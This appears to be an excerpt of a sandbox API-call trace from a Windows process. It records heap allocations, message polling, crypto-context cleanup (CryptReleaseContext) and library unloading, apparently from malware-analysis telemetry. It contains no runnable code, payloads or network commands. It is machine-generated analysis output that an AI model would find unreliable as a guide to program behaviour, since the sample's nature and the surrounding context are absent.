RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0252.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0252.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0252.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0252.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0252.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0252.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0252.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0252.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0252.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0252.303] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0252.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0252.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0252.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0252.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0252.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0252.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0252.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0252.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0252.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0252.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0252.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0252.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0252.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0252.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0252.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0252.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0252.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0252.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0252.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0252.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0252.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0252.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0252.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0252.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0252.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0252.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0252.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0252.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0252.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0252.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0252.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0252.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0252.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0252.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0252.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0252.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0252.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0252.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0252.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0252.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0252.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0252.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0252.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0252.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0252.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0252.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0252.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0252.306] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0252.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0252.307] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0252.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0252.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0252.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51580 [0252.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0252.307] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0252.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0252.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0252.307] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0252.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0252.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0252.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51310 [0252.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0252.307] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0252.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0252.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0252.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0252.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0252.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0252.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0252.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0252.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0252.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0252.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51448 [0252.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0252.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0252.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51418 [0252.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51460 [0252.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0252.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0252.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51490 [0252.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514c0 [0252.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514f0 [0252.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0252.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0252.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0252.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0252.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0252.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0252.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0252.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0252.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0252.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0252.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0252.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0252.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0252.309] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0252.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0252.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0252.309] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0252.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0252.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55fb8 [0252.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0252.393] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0252.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55fb8 | out: hHeap=0x970000) returned 1 [0252.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0252.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0252.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0252.394] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0252.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0252.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0252.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0252.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0252.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0252.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0252.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0252.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0252.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0252.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0252.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0252.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0252.394] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0252.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0252.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0252.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0252.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ff0 [0252.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0252.395] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0252.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ff0 | out: hHeap=0x970000) returned 1 [0252.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0252.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514a8 [0252.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0252.395] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0252.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0252.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0252.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0252.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0252.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0252.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0252.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0252.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0252.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0252.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0252.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0252.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0252.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0252.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0252.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0252.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0252.396] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0252.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0252.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0252.396] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0252.396] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0252.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e699a8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0252.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0252.397] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0252.397] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0252.397] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0252.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0252.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0252.397] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0252.397] FreeLibrary (hLibModule=0x756e0000) returned 1 [0252.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0252.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0252.397] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0252.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0252.397] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0252.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0252.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0252.398] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0252.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0252.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0252.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0252.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0252.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0252.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0252.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0252.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0252.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0252.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514f0 [0252.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51310 [0252.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0252.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51388 [0252.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0252.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0252.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512c8 [0252.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0252.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0252.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0252.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0252.399] CloseHandle (hObject=0x2d0) returned 1 [0252.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0252.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0252.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0252.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0252.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0252.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0252.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0252.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0252.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0252.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0252.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0252.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0252.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0252.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0252.401] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0252.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0252.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0252.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0252.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0252.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0252.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0252.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0252.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0252.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514c0 [0252.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513d0 [0252.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0252.401] 